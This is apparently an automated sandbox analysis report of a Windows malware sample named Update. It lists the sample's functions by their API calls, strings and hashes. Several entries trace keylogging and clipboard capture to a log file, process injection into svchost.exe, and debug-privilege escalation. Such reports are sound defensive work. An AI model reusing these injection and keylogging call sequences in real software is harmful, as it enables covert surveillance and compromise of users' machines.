                                                                                            Function 00021000 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • TCGamerUpdateMain.UPDATE(?,?), ref: 0002100B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3562466950.0000000000021000.00000020.00000001.01000000.00000005.sdmp, Offset: 00020000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3562433732.0000000000020000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3562507849.0000000000022000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3562539425.0000000000023000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3562581470.0000000000024000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3562581470.0000000000066000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_20000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: GamerMainUpdate
                                                                                            • String ID:
                                                                                            • API String ID: 3533789159-0
                                                                                            • Opcode ID: 0dc032e54f475a4c8a862538ffc73d883b9d6e7095286aea5a65631e74e2db75
                                                                                            • Instruction ID: b6ef548c66d66bbbbda11579d30d492b49407b9ff5cbf57de7122c4c6695da29
                                                                                            • Opcode Fuzzy Hash: 0dc032e54f475a4c8a862538ffc73d883b9d6e7095286aea5a65631e74e2db75
                                                                                            • Instruction Fuzzy Hash: 81B092B656020C7B8B44EAD8EC82CDA339C5B58750B408014BE0C8B242E976FA9087A1
                                                                                            Function 1001F63D Relevance: 1.5, APIs: 1, Instructions: 3networkCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565159063.000000001001F000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564959717.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565009522.0000000010001000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565037672.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565063105.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565181608.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: send
                                                                                            • String ID:
                                                                                            • API String ID: 2809346765-0
                                                                                            • Opcode ID: b133ea7d05f53c3c11ad6334d0588478f261473ccb87b5617e28918120fa56af
                                                                                            • Instruction ID: 6b957aef4a72e5dc30e8cb3213a85d60c43ac51bc1e09057d618b7ba0e2fc2ae
                                                                                            • Opcode Fuzzy Hash: b133ea7d05f53c3c11ad6334d0588478f261473ccb87b5617e28918120fa56af
                                                                                            • Instruction Fuzzy Hash: 8D900238288511FAA2124A2158897593654D6145423185418DC02C9010D631C2806514
                                                                                            Function 6C3718C0 Relevance: 1.4, APIs: 1, Instructions: 185COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9bad77c0454ea42c43571cb445b654ff3a7fc6748818a994e533720029378190
                                                                                            • Instruction ID: 85cdb5b54c8acb9fef6835098284d0e826a58c8f75799684903775f3aa5e0fbb
                                                                                            • Opcode Fuzzy Hash: 9bad77c0454ea42c43571cb445b654ff3a7fc6748818a994e533720029378190
                                                                                            • Instruction Fuzzy Hash: A761E672A046069BCB24CF69C4A0659B3B5FF46328F108329D06997E80E739E495CFF6
                                                                                            Function 10005EB2 Relevance: 1.3, APIs: 1, Instructions: 15sleepCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • Sleep.KERNEL32 ref: 10005EB2
                                                                                              • Part of subcall function 10006F17: _malloc.LIBCMT ref: 10006F31
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565009522.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564959717.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565037672.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565063105.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565159063.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565181608.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Sleep_malloc
                                                                                            • String ID:
                                                                                            • API String ID: 617756273-0
                                                                                            • Opcode ID: bd1a2801bd1f1b37b244e82fcf0364694be79379b717d5536a6d8ec7b8dccb93
                                                                                            • Instruction ID: c703cf204976232012e29921027dce2d5ea17eb50e6b597cbfa29dc34b4da51f
                                                                                            • Opcode Fuzzy Hash: bd1a2801bd1f1b37b244e82fcf0364694be79379b717d5536a6d8ec7b8dccb93
                                                                                            • Instruction Fuzzy Hash: 6CD0A772D08202CBE7B0EDD048C403D6052A758284F74803DD6059D001D5718D849382
                                                                                            Function 6C3880E0 Relevance: 1.3, APIs: 1, Instructions: 4sleepCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Sleep
                                                                                            • String ID:
                                                                                            • API String ID: 3472027048-0
                                                                                            • Opcode ID: 464345d43f8d070fa7468847a4a067db7c8ba29ea5911be32b5103a462189420
                                                                                            • Instruction ID: 3211c28c215208bbae4fa7b9b363666a254ee15bc8f15742e3b1ca030f1b310c
                                                                                            • Opcode Fuzzy Hash: 464345d43f8d070fa7468847a4a067db7c8ba29ea5911be32b5103a462189420
                                                                                            • Instruction Fuzzy Hash: FDA002B17521044687145774580EC8675E89FBA71274185217311E9144DA748090D939

                                                                                            Non-executed Functions

                                                                                            Function 034EE850 Relevance: 72.1, APIs: 36, Strings: 5, Instructions: 311stringfilesynchronizationCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _memset.LIBCMT ref: 034EE8A9
                                                                                            • Sleep.KERNEL32(00000001,?,?,?,034E604D), ref: 034EE8B3
                                                                                            • GetTickCount.KERNEL32 ref: 034EE8BF
                                                                                            • GetTickCount.KERNEL32 ref: 034EE8D2
                                                                                            • InterlockedExchange.KERNEL32(03511F08,00000000), ref: 034EE8DA
                                                                                            • OpenClipboard.USER32(00000000), ref: 034EE8E2
                                                                                            • GetClipboardData.USER32(0000000D), ref: 034EE8EA
                                                                                            • GlobalSize.KERNEL32(00000000), ref: 034EE8FB
                                                                                            • GlobalLock.KERNEL32(00000000), ref: 034EE90C
                                                                                            • wsprintfW.USER32 ref: 034EE985
                                                                                            • _memset.LIBCMT ref: 034EE9A3
                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 034EE9AC
                                                                                            • CloseClipboard.USER32 ref: 034EE9B2
                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 034EE9CA
                                                                                            • CreateFileW.KERNEL32(03510D80,40000000,00000002,00000000,00000004,00000002,00000000), ref: 034EE9E4
                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 034EEA02
                                                                                            • lstrlenW.KERNEL32(03505B48,?,00000000), ref: 034EEA16
                                                                                            • WriteFile.KERNEL32(00000000,03505B48,00000000), ref: 034EEA25
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 034EEA2C
                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 034EEA38
                                                                                            • GetKeyState.USER32(00000014), ref: 034EEABC
                                                                                            • lstrlenW.KERNEL32(0350B4A8), ref: 034EEB0B
                                                                                            • wsprintfW.USER32 ref: 034EEB1D
                                                                                            • lstrlenW.KERNEL32(0350B4D0), ref: 034EEB3E
                                                                                            • lstrlenW.KERNEL32(0350B4D0), ref: 034EEB61
                                                                                            • wsprintfW.USER32 ref: 034EEB7F
                                                                                            • wsprintfW.USER32 ref: 034EEB95
                                                                                            • wsprintfW.USER32 ref: 034EEBBF
                                                                                            • lstrlenW.KERNEL32(00000000), ref: 034EEC0B
                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 034EEC21
                                                                                            • CreateFileW.KERNEL32(03510D80,40000000,00000002,00000000,00000004,00000002,00000000), ref: 034EEC3B
                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 034EEC59
                                                                                            • lstrlenW.KERNEL32(00000000,?,00000000), ref: 034EEC69
                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000000), ref: 034EEC74
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 034EEC7B
                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 034EEC88
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Filelstrlen$wsprintf$ClipboardCloseGlobal$CountCreateHandleMutexObjectPointerReleaseSingleTickWaitWrite_memset$DataExchangeInterlockedLockOpenSizeSleepStateUnlock
                                                                                            • String ID: [$%s%s$%s%s$%s%s$[esc]
                                                                                            • API String ID: 1637302245-2373594894
                                                                                            • Opcode ID: d83d01412e04efe5e028f11715d2602f053ce34a1241f4a703b67a7f21e3dc25
                                                                                            • Instruction ID: 31af232debb2e31db2cc20c9c7f3b5eb7f03797160e1fd6583f6c850023caec6
                                                                                            • Opcode Fuzzy Hash: d83d01412e04efe5e028f11715d2602f053ce34a1241f4a703b67a7f21e3dc25
                                                                                            • Instruction Fuzzy Hash: 10C1E570500301AFD720EF65DC4DFAAB7B4FB08705F04499AE25ACA2A4D77196CADF64
                                                                                            Function 034E77E0 Relevance: 68.5, APIs: 30, Strings: 9, Instructions: 240libraryloaderinjectionCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _memset.LIBCMT ref: 034E7804
                                                                                            • _memset.LIBCMT ref: 034E7850
                                                                                            • GetSystemDirectoryA.KERNEL32(?,000000FF), ref: 034E7864
                                                                                              • Part of subcall function 034E8720: _vswprintf_s.LIBCMT ref: 034E8731
                                                                                            • GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 034E7893
                                                                                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000214,00000000,00000000,00000044,?), ref: 034E78DA
                                                                                              • Part of subcall function 034E7740: GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,?,?,?,034E78FC), ref: 034E7756
                                                                                              • Part of subcall function 034E7740: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,034E78FC,?,?,?,?,?,?,74DF0630), ref: 034E775D
                                                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 034E790A
                                                                                            • _memset.LIBCMT ref: 034E7923
                                                                                            • LoadLibraryA.KERNEL32(Kernel32.dll,OpenProcess,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 034E793B
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 034E7944
                                                                                            • LoadLibraryA.KERNEL32(Kernel32.dll,ExitProcess,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 034E7956
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 034E7959
                                                                                            • LoadLibraryA.KERNEL32(Kernel32.dll,WinExec,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 034E796B
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 034E796E
                                                                                            • LoadLibraryA.KERNEL32(Kernel32.dll,WaitForSingleObject,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 034E7980
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 034E7983
                                                                                            • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 034E798B
                                                                                            • GetProcessId.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 034E7992
                                                                                            • _memset.LIBCMT ref: 034E79B4
                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,000000FA,?,?,?,?,?,?,?,?,?,?,?,?,74DF0630), ref: 034E79CA
                                                                                            • VirtualAllocEx.KERNEL32(00000000,00000000,00000118,00003000,00000040), ref: 034E79FF
                                                                                            • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000118,00000000), ref: 034E7A1B
                                                                                            • VirtualProtectEx.KERNEL32(00000000,00000000,00000118,00000001,?), ref: 034E7A43
                                                                                            • VirtualAllocEx.KERNEL32(00000000,00000000,00001000,00003000,00000040), ref: 034E7A58
                                                                                            • WriteProcessMemory.KERNEL32(00000000,00000000,034E76F0,00001000,00000000), ref: 034E7A72
                                                                                            • VirtualProtectEx.KERNEL32(00000000,00000000,00001000,00000001,00000000), ref: 034E7A90
                                                                                            • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000), ref: 034E7AA1
                                                                                            • Sleep.KERNEL32(0000EA60,?,?,?,?,?,?,?,?,?,?,?,?,?,?,74DF0630), ref: 034E7ABA
                                                                                            • VirtualProtectEx.KERNEL32(00000000,00000000,00000118,00000040,00000000), ref: 034E7AD6
                                                                                            • VirtualProtectEx.KERNEL32(00000000,00000000,00001000,00000040,00000000), ref: 034E7AE8
                                                                                            • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,74DF0630), ref: 034E7AF1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Process$Virtual$AddressLibraryLoadProcProtect_memset$AllocCreateCurrentFileMemoryOpenThreadWrite$AttributesDirectoryModuleNameRemoteResumeSleepSystemToken_vswprintf_s
                                                                                            • String ID: %s%s$D$ExitProcess$Kernel32.dll$OpenProcess$WaitForSingleObject$WinExec$Windows\SysWOW64\svchost.exe$Windows\System32\svchost.exe
                                                                                            • API String ID: 4176418925-3213446972
                                                                                            • Opcode ID: f9f8123eba8ff2a07b2987f9ec5ea86ca6dedfd763c073cf8698b816abec043f
                                                                                            • Instruction ID: d515381ee47cdb73a3b600f19b6b18b9b7e6092382ae93a858edcb24ed9da4e3
                                                                                            • Opcode Fuzzy Hash: f9f8123eba8ff2a07b2987f9ec5ea86ca6dedfd763c073cf8698b816abec043f
                                                                                            • Instruction Fuzzy Hash: D781C871A403187FDB21EB61DC49FDF777CEF55B05F000499F208AA191EAB19A85CE68
                                                                                            Function 034E7E50 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 131threadinjectionprocessCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _memset.LIBCMT ref: 034E7E73
                                                                                            • _memset.LIBCMT ref: 034E7E9F
                                                                                            • _memset.LIBCMT ref: 034E7ED4
                                                                                            • GetSystemDirectoryA.KERNEL32(?,000000FF), ref: 034E7EE8
                                                                                              • Part of subcall function 034E8720: _vswprintf_s.LIBCMT ref: 034E8731
                                                                                            • GetFileAttributesA.KERNEL32(?), ref: 034E7F15
                                                                                            • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 034E7F65
                                                                                            • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 034E7F92
                                                                                            • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,00003000,00000040), ref: 034E7FAA
                                                                                            • GetThreadContext.KERNEL32(?,?,?,00000000,?,00003000,00000040), ref: 034E7FCC
                                                                                            • SetThreadContext.KERNEL32(?,00010007,?,00000000,?,00003000,00000040), ref: 034E7FEA
                                                                                            • ResumeThread.KERNEL32(?,?,00000000,?,00003000,00000040), ref: 034E7FFF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Thread_memset$ContextProcess$AllocAttributesCreateDirectoryFileMemoryResumeSystemVirtualWrite_vswprintf_s
                                                                                            • String ID: %s%s$D$Windows\SysWOW64\svchost.exe$Windows\System32\svchost.exe
                                                                                            • API String ID: 2170139861-2473635271
                                                                                            • Opcode ID: ec48b86ca49b7f0148899c97c836c2d9d124f84293568d0954abf80ad5faed8b
                                                                                            • Instruction ID: a049e3abaefa125a30c6da149582dc18d2447892317ed13bdd34211b33ffcc3c
                                                                                            • Opcode Fuzzy Hash: ec48b86ca49b7f0148899c97c836c2d9d124f84293568d0954abf80ad5faed8b
                                                                                            • Instruction Fuzzy Hash: 434194B1A003586FDB20DB61DC95FDE77BCAB44705F0045D9E609AA2C0EAB15B85CF54
                                                                                            Function 034EE4F0 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 143synchronizationfilekeyboardCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,03510D80,74DEE010,74DF2FA0,74DF0F00,?,034E6028,?,?), ref: 034EE519
                                                                                            • lstrcatW.KERNEL32(03510D80,\DisplaySessionContainers.log,?,034E6028,?,?), ref: 034EE529
                                                                                            • CreateMutexW.KERNEL32(00000000,00000000,03510D80,?,034E6028,?,?), ref: 034EE538
                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,034E6028,?,?), ref: 034EE546
                                                                                            • CreateFileW.KERNEL32(03510D80,40000000,00000002,00000000,00000004,00000080,00000000,?,034E6028,?,?), ref: 034EE563
                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,034E6028,?,?), ref: 034EE56E
                                                                                            • CloseHandle.KERNEL32(00000000,?,034E6028,?,?), ref: 034EE577
                                                                                            • DeleteFileW.KERNEL32(03510D80,?,034E6028,?,?), ref: 034EE58A
                                                                                            • ReleaseMutex.KERNEL32(00000000,?,034E6028,?,?), ref: 034EE597
                                                                                            • DirectInput8Create.DINPUT8(?,00000800,03504934,03511220,00000000,?,034E6028,?,?), ref: 034EE5B2
                                                                                            • GetTickCount.KERNEL32 ref: 034EE665
                                                                                            • GetKeyState.USER32(00000014), ref: 034EE672
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateFile$Mutex$CloseCountDeleteDirectFolderHandleInput8ObjectPathReleaseSingleSizeStateTickWaitlstrcat
                                                                                            • String ID: <$\DisplaySessionContainers.log
                                                                                            • API String ID: 1095970075-1170057892
                                                                                            • Opcode ID: 84beee8042f451e7c7240a26034afdedaa25c6c1ec121e9b36da511adea2565f
                                                                                            • Instruction ID: 691cb5ac3704cb0217483a25eb7f3d3a180c423fa9ae6bd2bf9185ee66f6ebfe
                                                                                            • Opcode Fuzzy Hash: 84beee8042f451e7c7240a26034afdedaa25c6c1ec121e9b36da511adea2565f
                                                                                            • Instruction Fuzzy Hash: CF419B70740305AFD700EFA5EC49F9E7BA8AB48709F104449F725DF2A4C672E58A9F98
                                                                                            Function 034E7620 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 69libraryloaderCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32(00000020,?,?,?,?,?,?,?,?,034EDFA4), ref: 034E7637
                                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,034EDFA4), ref: 034E763E
                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 034E765A
                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 034E7677
                                                                                            • CloseHandle.KERNEL32(?), ref: 034E7681
                                                                                            • GetModuleHandleA.KERNEL32(NtDll.dll,NtSetInformationProcess,?,?,?,?,?,?,?,034EDFA4), ref: 034E7691
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 034E7698
                                                                                            • GetCurrentProcessId.KERNEL32 ref: 034E76BA
                                                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 034E76C7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Process$CurrentHandleOpenToken$AddressAdjustCloseLookupModulePrivilegePrivilegesProcValue
                                                                                            • String ID: NtDll.dll$NtSetInformationProcess$SeDebugPrivilege
                                                                                            • API String ID: 1802016953-1577477132
                                                                                            • Opcode ID: 9668d9d1a5e2d9c6398b5b3278e360379fc295554c9efab52c83a09eeed5c11f
                                                                                            • Instruction ID: 6fabefaf2f99dbce15090587d76a83b0ba7d41a8d266f6deb9c979f8164d38e5
                                                                                            • Opcode Fuzzy Hash: 9668d9d1a5e2d9c6398b5b3278e360379fc295554c9efab52c83a09eeed5c11f
                                                                                            • Instruction Fuzzy Hash: 1621A571A40308AFE710EBE4DC1EFBE7778EB08715F004809FA05AA1D0DAB25549DBA5
                                                                                            Function 034F054D Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 92memorylibraryloaderCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 034F0576
                                                                                            • GetSystemInfo.KERNEL32(?), ref: 034F058E
                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 034F059E
                                                                                            • GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 034F05AE
                                                                                            • VirtualAlloc.KERNEL32(?,-00000001,00001000,00000004), ref: 034F0600
                                                                                            • VirtualProtect.KERNEL32(?,-00000001,00000104,?), ref: 034F0615
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Virtual$AddressAllocHandleInfoModuleProcProtectQuerySystem
                                                                                            • String ID: SetThreadStackGuarantee$kernel32.dll
                                                                                            • API String ID: 3290314748-423161677
                                                                                            • Opcode ID: 92ae7c8a528f9025e86607ef4e6edda005f3ad03ddb78dc5c89e961d46c609af
                                                                                            • Instruction ID: 8676836dfa6e00c7129b524c6a24b56b3f3c03711242f103b3bb38d70d01d1af
                                                                                            • Opcode Fuzzy Hash: 92ae7c8a528f9025e86607ef4e6edda005f3ad03ddb78dc5c89e961d46c609af
                                                                                            • Instruction Fuzzy Hash: CC31C371E0021AAFDB10DBA0DC84AFFB7B9EB84745F180516E611EB155DB70AA05CB94
                                                                                            Function 034E7B70 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 60COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 034E7B89
                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 034E7B90
                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 034E7BB6
                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 034E7BCC
                                                                                            • GetLastError.KERNEL32 ref: 034E7BD2
                                                                                            • CloseHandle.KERNEL32(?), ref: 034E7BE0
                                                                                            • CloseHandle.KERNEL32(?), ref: 034E7BFB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseHandleProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                            • String ID: SeShutdownPrivilege
                                                                                            • API String ID: 3435690185-3733053543
                                                                                            • Opcode ID: 1016c142a0a9ccfed60532011b29cb54b1d98f3885027eea339a1ef1ec006127
                                                                                            • Instruction ID: 29b1d0ae768e4f6319617bbe0918629a2b1a721afaa580be79b6517b79dd01a5
                                                                                            • Opcode Fuzzy Hash: 1016c142a0a9ccfed60532011b29cb54b1d98f3885027eea339a1ef1ec006127
                                                                                            • Instruction Fuzzy Hash: 2711C471A40309AFDB10EFA0DC1DFAE7B78EB08709F404959F905AB184CA729909DBA0
                                                                                            Function 6C3A616E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 182COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 6C39A893: GetLastError.KERNEL32(?,?,6C395151,?,6C371A6D,00000000), ref: 6C39A897
                                                                                              • Part of subcall function 6C39A893: SetLastError.KERNEL32(00000000,6C371A6D,00000000), ref: 6C39A939
                                                                                            • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 6C3A6276
                                                                                            • IsValidCodePage.KERNEL32(00000000), ref: 6C3A62B4
                                                                                            • IsValidLocale.KERNEL32(?,00000001), ref: 6C3A62C7
                                                                                            • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 6C3A630F
                                                                                            • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 6C3A632A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
